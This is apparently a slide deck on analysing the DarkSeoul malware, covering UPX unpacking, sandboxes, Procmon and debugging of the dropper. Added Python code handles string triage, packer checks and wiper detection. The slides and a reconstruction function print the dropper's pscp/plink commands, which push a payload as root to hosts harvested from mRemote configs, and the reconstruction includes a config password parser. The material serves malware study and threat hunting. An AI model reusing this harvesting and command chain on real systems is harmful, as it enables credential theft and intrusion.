Strings Sysinternals Unpacking using unpacker upx d packed
- Slides: 53
Initial analysis – Strings (Sysinternals)
Unpacking – using unpacker: upx -d <packed file> -o <output file>
Unpacking – using unpacker: Unpacked!
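As an added example (not code from the slides), a small reimplementation of what Sysinternals Strings does when you pull both ASCII and Unicode strings from a sample, followed by the first-pass triage an analyst performs on the output. The blob it scans is constructed here; it is not bytes from the DarkSeoul sample. The point it makes that the slide only hints at: Windows malware stores paths and other literals as UTF-16LE, so an ASCII-only pass misses them.

```python
import re
import sys

# Constructed sample blob for this example (not bytes from the DarkSeoul sample):
# an ASCII DLL name, a UTF-16LE path of the kind the dropper checks, junk, and a
# UPX section name. Double NULs separate the regions so runs do not bleed together.
SAMPLE = (
    b"MZ\x90\x00\x03\x00\x00\x00"
    + b"kernel32.dll\x00\x00"
    + "C:\\windows\\temp\\~v3.log".encode("utf-16-le") + b"\x00\x00"
    + b"\x01\x02\x03ab\x04"
    + b"UPX0\x00\x00\x00\x00"
)

# Printable 7-bit ASCII, the same character class strings tools use by default.
ASCII_CHAR = rb"[\x20-\x7e]"


def extract_strings(data, min_len=4):
    """Return (ascii_strings, unicode_strings) in file order.

    Mirrors what Sysinternals Strings reports with -a (ASCII) and -u (Unicode):
    Unicode here means UTF-16LE runs of printable ASCII code points, which is
    how Windows binaries store wide-string literals such as paths.
    """
    ascii_re = re.compile(ASCII_CHAR + rb"{%d,}" % min_len)
    wide_re = re.compile(rb"(?:" + ASCII_CHAR + rb"\x00){%d,}" % min_len)
    ascii_hits = [m.group().decode("ascii") for m in ascii_re.finditer(data)]
    wide_hits = [m.group().decode("utf-16-le") for m in wide_re.finditer(data)]
    return ascii_hits, wide_hits


# Categories an analyst scans the string dump for first.
TRIAGE_PATTERNS = {
    "path": re.compile(r"^[A-Za-z]:\\|%[A-Za-z]+%"),
    "pe_module": re.compile(r"\.(?:dll|exe|sys)$", re.IGNORECASE),
    "network": re.compile(r"^(?:https?://|\d{1,3}(?:\.\d{1,3}){3}$)"),
    "upx_marker": re.compile(r"^UPX[0-9!]"),
}


def triage(strings):
    """Bucket strings by category; a string may land in more than one bucket."""
    hits = {name: [] for name in TRIAGE_PATTERNS}
    for s in strings:
        for name, pat in TRIAGE_PATTERNS.items():
            if pat.search(s):
                hits[name].append(s)
    return hits


if __name__ == "__main__":
    # Usage: python strings_triage.py <file>; falls back to the constructed sample.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    ascii_hits, wide_hits = extract_strings(data)
    for label, items in (("ASCII", ascii_hits), ("Unicode", wide_hits)):
        print(f"[{label}] {len(items)} strings")
        for s in items:
            print("   ", s)
    for name, items in triage(ascii_hits + wide_hits).items():
        if items:
            print(f"[{name}] {items}")
```

A UPX section name or a tiny string count in the ASCII pass is the usual first sign that the sample is packed and the real strings will only appear after unpacking.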
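Before running the upx -d command from the slide it is worth confirming the sample really is UPX-packed and not merely carrying UPX-looking section names. The following is an added example, not code from the slides: it parses the PE section table by hand, checks the two cheap UPX tells (UPX0/UPX1 section names and the "UPX!" magic near the header), reports per-section entropy as the fallback signal when a modified packer has renamed the sections, and wraps the slide's upx -d invocation. The build_fake_pe helper only constructs a header-shaped buffer for testing; it is not a loadable executable.

```python
import math
import shutil
import struct
import subprocess
from collections import Counter

COFF_HEADER_SIZE = 20
SECTION_HEADER_SIZE = 40


def shannon_entropy(buf):
    """Bits per byte; packed or encrypted data sits near 8.0, plain x86 code lower."""
    if not buf:
        return 0.0
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values())


def pe_sections(data):
    """Parse the section table: name, raw size, raw offset, entropy of the raw bytes."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    (num_sections,) = struct.unpack_from("<H", data, coff + 2)       # NumberOfSections
    (size_of_optional,) = struct.unpack_from("<H", data, coff + 16)  # SizeOfOptionalHeader
    table = coff + COFF_HEADER_SIZE + size_of_optional
    sections = []
    for i in range(num_sections):
        off = table + i * SECTION_HEADER_SIZE
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", data, off + 16)  # SizeOfRawData, PointerToRawData
        raw = data[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name, "raw_size": raw_size, "raw_ptr": raw_ptr,
                         "entropy": shannon_entropy(raw)})
    return sections


def pe_section_names(data):
    return [s["name"] for s in pe_sections(data)]


def looks_upx_packed(data):
    """UPX0/UPX1/UPX2 section names or the 'UPX!' magic near the header.

    Both tells are trivially removed by a modified packer; the entropy in
    pe_sections() is the signal to fall back on when the names were renamed.
    """
    names = pe_section_names(data)
    return any(n.startswith("UPX") for n in names) or b"UPX!" in data[:0x1000]


def upx_unpack(packed_path, out_path):
    """The slide's command, upx -d <packed file> -o <output file>; needs upx on PATH."""
    if shutil.which("upx") is None:
        raise RuntimeError("upx is not installed or not on PATH")
    subprocess.run(["upx", "-d", packed_path, "-o", out_path], check=True)
    return out_path


def build_fake_pe(sections):
    """Construct a minimal PE-shaped test buffer from (name, raw_bytes) pairs.

    Only the fields pe_sections() reads are meaningful; this is not a runnable image.
    """
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x102)
    raw_ptr = e_lfanew + 4 + COFF_HEADER_SIZE + SECTION_HEADER_SIZE * len(sections)
    table, body = b"", b""
    for name, raw in sections:
        table += name.encode("ascii").ljust(8, b"\0")
        table += struct.pack("<IIII", len(raw), 0, len(raw), raw_ptr) + b"\0" * 16
        raw_ptr += len(raw)
        body += raw
    return dos + b"PE\0\0" + coff + table + body


if __name__ == "__main__":
    # Constructed inputs: a UPX-shaped buffer and a plain one (not real samples).
    packed = build_fake_pe([("UPX0", b""), ("UPX1", bytes(range(256)) * 4)])
    plain = build_fake_pe([(".text", b"\x90" * 64), (".data", b"A" * 16)])
    for label, blob in (("packed", packed), ("plain", plain)):
        print(label, looks_upx_packed(blob),
              [(s["name"], round(s["entropy"], 2)) for s in pe_sections(blob)])
```

After upx -d, re-run the section and string checks on the output: a successful unpack replaces the UPX sections with the original ones and makes the import table and strings visible again.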
Dynamic analysis – tool introduction: <Process Monitor> <Autoruns>
Automated analysis (Automated System) • Cuckoo Sandbox, CWSandbox • http://www.cuckoosandbox.org • http://mwanalysis.org
Automated analysis (Automated System) < Basic structure of CWSandbox >
Automated analysis – Cuckoo Sandbox
Automated analysis – https://malwr.com/ • based on Cuckoo Sandbox • uses the VirusTotal library
Note) Automated APK analysis < Android APK file analysis services > • Stowaway • SanDroid • Mobile-Sandbox • CopperDroid • ComDroid • AndroTotal <Windows binary, APK, suspicious URL> • Anubis
Dynamic analysis – Automated System
Dynamic analysis – Automated System: 4 drop files present
Dynamic analysis – Automated System • DarkSeoulDropper API call flow
Dynamic analysis – Automated System • AgentBase.exe API call flow
Dynamic analysis – Automated System • Telling Pasvc.exe and Clisvc.exe apart
                 Pasvc.exe                                Clisvc.exe
  Product        AhnLab Policy Agent                      ViRobot ISMS
  Company        AhnLab, Inc.                             Hauri
  Description    paSvc                                    Service for VISMS Agent
  Directory      %PROGRAMFILES%\AhnLab\APC2\Policy Agent  %PROGRAMFILES%\Hauri\SiteClient
Dynamic analysis – Automated System • AgentBase.exe API call flow: proceeds through PhysicalDrive0 to PhysicalDrive9
Dynamic analysis – Automated System • AgentBase.exe API call flow: access flags SYNCHRONIZE | FILE_SHARE_READ, then SYNCHRONIZE | GENERIC_WRITE | FILE_READ_ATTRIBUTES; proceeds through drive letters B: to Y:
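The two slides above describe the wiper's signature behaviour: one process opening \\.\PhysicalDrive0 through 9 and then every drive letter B: through Y: with GENERIC_WRITE. That pattern is easy to pull out of a Process Monitor capture. The following is an added example, not code from the slides: it reads a Procmon CSV export (File > Save as CSV), keeps only CreateFile events against raw disks or volume roots, records whether write access was requested, and flags any process that did this to more than one device. The CSV rows are constructed for the example in Procmon's column layout; they are not from the actual DarkSeoul run, and the Procmon access-token spellings used in WRITE_RIGHTS are the ones I have seen in its Detail column.

```python
import csv
import io
import re

# Constructed sample in the column layout of a Procmon CSV export (rows are made up).
SAMPLE_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"2:00:01.0000000 PM","AgentBase.exe","1234","CreateFile","\\.\PhysicalDrive0","SUCCESS","Desired Access: Generic Write, Read Attributes, Synchronize, Disposition: Open, Options: Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, AllocationSize: n/a, OpenResult: Opened"
"2:00:01.0000100 PM","AgentBase.exe","1234","CreateFile","\\.\PhysicalDrive1","NAME NOT FOUND","Desired Access: Generic Write, Read Attributes, Synchronize, Disposition: Open, Options: Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, AllocationSize: n/a"
"2:00:01.0000200 PM","AgentBase.exe","1234","CreateFile","C:","SUCCESS","Desired Access: Generic Write, Read Attributes, Synchronize, Disposition: Open, Options: Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, AllocationSize: n/a, OpenResult: Opened"
"2:00:01.0000300 PM","AgentBase.exe","1234","CreateFile","D:","NAME NOT FOUND","Desired Access: Generic Write, Read Attributes, Synchronize, Disposition: Open, Options: Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, AllocationSize: n/a"
"2:00:02.0000000 PM","notepad.exe","555","CreateFile","C:\Users\analyst\Desktop\notes.txt","SUCCESS","Desired Access: Generic Read, Disposition: Open, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: n/a, ShareMode: Read, Write, AllocationSize: n/a, OpenResult: Opened"
"2:00:03.0000000 PM","svchost.exe","900","CreateFile","\\.\PhysicalDrive0","SUCCESS","Desired Access: Read Attributes, Synchronize, Disposition: Open, Options: Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, AllocationSize: n/a, OpenResult: Opened"
'''

# Raw disk (\\.\PhysicalDriveN, \Device\HarddiskN\DRN) or bare volume root (C:).
RAW_DEVICE_RE = re.compile(
    r"^(?:\\\\\.\\)?(?:PhysicalDrive\d+|[A-Za-z]:)$|^\\Device\\Harddisk\d+\\DR\d+$",
    re.IGNORECASE,
)
# Procmon renderings of access rights that allow writing to the device.
WRITE_RIGHTS = {"Generic Write", "Generic All", "Write Data/Add File", "Maximum Allowed"}


def desired_access(detail):
    """Pull the Desired Access token set out of a Procmon CreateFile Detail string."""
    m = re.search(
        r"Desired Access:\s*(.*?)(?:,\s*(?:Disposition|Options|Attributes|ShareMode):|$)",
        detail,
    )
    if not m:
        return set()
    return {tok.strip() for tok in m.group(1).split(",") if tok.strip()}


def is_raw_device(path):
    return bool(RAW_DEVICE_RE.match(path))


def triage_procmon_csv(text):
    """Group raw-device CreateFile events per (process, pid); note write access.

    Failed opens (NAME NOT FOUND on absent drives) are kept on purpose: the
    sweep across B: to Y: is itself the signal, whether or not a drive exists.
    """
    findings = {}
    for row in csv.DictReader(io.StringIO(text)):
        if row["Operation"] != "CreateFile" or not is_raw_device(row["Path"]):
            continue
        key = (row["Process Name"], row["PID"])
        entry = findings.setdefault(key, {"devices": [], "write": False, "results": []})
        entry["devices"].append(row["Path"])
        entry["results"].append(row["Result"])
        if desired_access(row["Detail"]) & WRITE_RIGHTS:
            entry["write"] = True
    return findings


def suspicious_wipers(findings, min_devices=2):
    """Processes that opened several raw disks/volumes for write: the wiper pattern."""
    return sorted(key for key, e in findings.items()
                  if e["write"] and len(e["devices"]) >= min_devices)


if __name__ == "__main__":
    findings = triage_procmon_csv(SAMPLE_CSV)
    for key in suspicious_wipers(findings):
        e = findings[key]
        print(f"{key[0]} (PID {key[1]}): write access to {len(e['devices'])} devices: {e['devices']}")
```

A legitimate process such as a backup agent or a disk utility can also open raw volumes, which is why the check keys on write access plus breadth (several devices in one process) rather than on the raw open alone; tune min_devices to the host.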
Dynamic analysis – Limits of Malwr.com – DarkComet?? <DarkSeoul> <DarkComet> No behavioral analysis?
Dynamic analysis – Limits of Malwr.com – DarkComet
Debugging – Tools • User-mode debugging: OllyDbg http://www.ollydbg.de/, IDA https://www.hex-rays.com • Kernel-mode debugging: WinDbg http://msdn.microsoft.com
Debugging – DarkSeoulDropper • DarkSeoulDropper's startup code
Debugging – DarkSeoulDropper • drop files: if "C:\windows\temp\~v3.log" does not exist, AgentBase.exe is executed
Debugging – DarkSeoulDropper: "c:\Documents and settings\Administrator\Local Settings\Application Data\Felix_Deimel\mRemote\confCons.xml" => mRemote; "c:\Documents and settings\Administrator\Application Data\VanDyke\Config\Sessions" => SecureCRT
Debugging – DarkSeoulDropper – if mRemote is installed -> calls function 4033A0; if SecureCRT is installed -> calls function 404370
Debugging – function 4033A0: parses Hostname, Descr, Panel, Port, Password
Debugging – function 404370: %TEMP%\conime.exe -batch -P PORT -l root Password %TEMP%\~pr1.tmp ServerIP:/tmp/cups ; %TEMP%\alg.exe -batch -P PORT -l root -pw Password ServerIP "chmod 755 /tmp/cups; /tmp/cups"
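The four slides above describe a credential-harvesting chain: the dropper checks for mRemote and SecureCRT configuration paths, parses Hostname, Descr, Panel, Port and Password out of mRemote's confCons.xml, and for each host builds a pscp/plink command pair that uploads ~pr1.tmp as /tmp/cups and runs it. As an added example, not code from the slides, the following reproduces that chain defensively: it locates the config paths, parses a constructed confCons.xml in mRemote's layout, renders the command lines the slide attributes to function 404370 so they can be hunted in process-creation logs, and gives a host- and password-independent regex for them. Assumptions: the slide's XP-era "Documents and Settings\Administrator\..." paths are written here as %LOCALAPPDATA% and %APPDATA%; both command lines use -pw for the password (the slide shows the pscp line without the flag); the Password attribute is kept exactly as stored, with no attempt to undo whatever encoding mRemote applies; and the sample hosts and values are invented.

```python
import os
import re
import xml.etree.ElementTree as ET

# Where the slides say the dropper looks, using the profile variables the XP paths expand from.
CONFIG_PATHS = {
    "mRemote": r"%LOCALAPPDATA%\Felix_Deimel\mRemote\confCons.xml",
    "SecureCRT": r"%APPDATA%\VanDyke\Config\Sessions",
}

# The attributes the slide says function 4033A0 parses out of confCons.xml.
HARVESTED_FIELDS = ("Hostname", "Descr", "Panel", "Port", "Password")

# Constructed sample in the confCons.xml layout mRemote writes (hosts and values made up).
SAMPLE_CONFCONS = """<?xml version="1.0" encoding="utf-8"?>
<Connections Name="Connections" Export="False" Protected="" ConfVersion="1.3">
  <Node Name="web01" Type="Connection" Descr="prod web" Panel="General" Hostname="10.0.0.10"
        Username="root" Password="c2VjcmV0" Protocol="SSH2" Port="22" />
  <Node Name="Linux" Type="Container" Expanded="True" Descr="" Panel="General" Hostname=""
        Username="" Password="" Protocol="SSH2" Port="22">
    <Node Name="db01" Type="Connection" Descr="postgres" Panel="General" Hostname="10.0.0.20"
          Username="root" Password="cGFzcw==" Protocol="SSH2" Port="2222" />
    <Node Name="jump" Type="Connection" Descr="rdp jump" Panel="General" Hostname="10.0.0.30"
          Username="admin" Password="eA==" Protocol="RDP" Port="3389" />
  </Node>
</Connections>
"""


def installed_session_managers():
    """The dropper's first check: which session-manager config paths exist on this host."""
    return {name: os.path.expandvars(p) for name, p in CONFIG_PATHS.items()
            if os.path.exists(os.path.expandvars(p))}


def parse_mremote_sessions(xml_text):
    """Collect the five harvested attributes from every Connection node that has a Hostname.

    Container nodes are skipped; the Password value is returned as stored in the file.
    """
    root = ET.fromstring(xml_text.encode("utf-8"))
    sessions = []
    for node in root.iter("Node"):
        if node.get("Type") != "Connection" or not node.get("Hostname"):
            continue
        sessions.append({field: node.get(field, "") for field in HARVESTED_FIELDS})
    return sessions


def dropper_commands(sessions, temp=r"%TEMP%"):
    """Render the command pair the slide attributes to function 404370, one pair per host.

    conime.exe is the renamed pscp, alg.exe the renamed PuTTY console; the slide
    hard-codes the user as root and tries every harvested host.
    """
    cmds = []
    for s in sessions:
        auth = f'-batch -P {s["Port"]} -l root -pw {s["Password"]}'
        cmds.append(f'{temp}\\conime.exe {auth} {temp}\\~pr1.tmp {s["Hostname"]}:/tmp/cups')
        cmds.append(f'{temp}\\alg.exe {auth} {s["Hostname"]} "chmod 755 /tmp/cups; /tmp/cups"')
    return cmds


# Shape of those command lines independent of host and password, for command-line log hunting.
HUNT_RE = re.compile(r"\b(?:conime|alg)\.exe -batch -P \d+ -l root -pw \S+", re.IGNORECASE)


if __name__ == "__main__":
    print("session managers present:", installed_session_managers())
    sessions = parse_mremote_sessions(SAMPLE_CONFCONS)
    for s in sessions:
        print("harvested:", s)
    for cmd in dropper_commands(sessions):
        print("would run:", cmd, "| hunt match:", bool(HUNT_RE.search(cmd)))
```

For incident response the useful outputs are the harvested host list (every one of those Linux hosts needs /tmp/cups checked) and HUNT_RE, which matches the renamed pscp/plink invocations in any log that records process command lines.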
Drop files – ~pr1.tmp
Drop files – conime.exe, alg.exe – conime.exe: PSCP console (build 2006.03.13 23:32:43) – alg.exe: PuTTY console (build 2013.02.14 23:14:13)
Drop files – AgentBase.exe
.NET File Reversing – DarkComet ????
.NET File Reversing – DarkComet • Decompiler – .NET Reflector
References
- Mentor Kang Heung-soo's (강흥수) BoB class
- AhnLab Clinic Center – [Malware detection -3] Emulators and sandboxes: http://acc.giro.or.kr/secu_view.asp?seq=9531&category=01
- https://malwr.com/
- ELF structure: http://pobimoon-syspg.blogspot.kr/2012/03/mips.html
- PE structure: http://reversecore.com/18
- .NET Framework errors: http://shallbox.tistory.com/43
- NSHC 3.20 cyber terror incident analysis report
- Malware analysis methodology, ASEC researcher Jang Young-jun (장영준): http://www.slideshare.net/youngjunchang14/slideshare-21143372
<Malware source> http://contagiodump.blogspot.kr
<.NET figure source> http://dotnetclass.blogsome.com
Q&A